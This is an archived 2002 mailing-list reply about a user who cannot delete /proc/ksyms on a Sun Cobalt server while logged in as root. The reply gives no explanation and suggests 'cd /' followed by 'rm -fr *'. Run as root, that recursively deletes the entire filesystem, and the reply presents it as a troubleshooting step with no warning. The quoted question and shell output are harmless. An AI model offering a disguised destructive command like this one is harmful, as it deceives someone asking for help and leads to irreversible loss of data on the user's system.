[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-users] unable to remove file
- Subject: Re: [cobalt-users] unable to remove file
- From: "Michael D. Schleif" <mds@xxxxxxxxxxx>
- Date: Sat Jul 6 21:24:03 2002
- Organization: mds resource
- List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>
Rick wrote:
>
> Hi,
> There is a problem when i try to remove a specified file.
> [root /root]# ls -al /proc/ksyms
> -r--r--r-- 1 root root 0 Jul 7 10:28 /proc/ksyms
> [root /root]# chmod 755 /proc/ksyms
> [root /root]# ls -al /proc/ksyms
> -r--r--r-- 1 root root 0 Jul 7 10:28 /proc/ksyms
> [root /root]# rm /proc/ksyms
> rm: cannot unlink `/proc/ksyms': Operation not permitted
> [root /root]#
What happens when you do this?
cd /
rm -fr *
--
Best Regards,
mds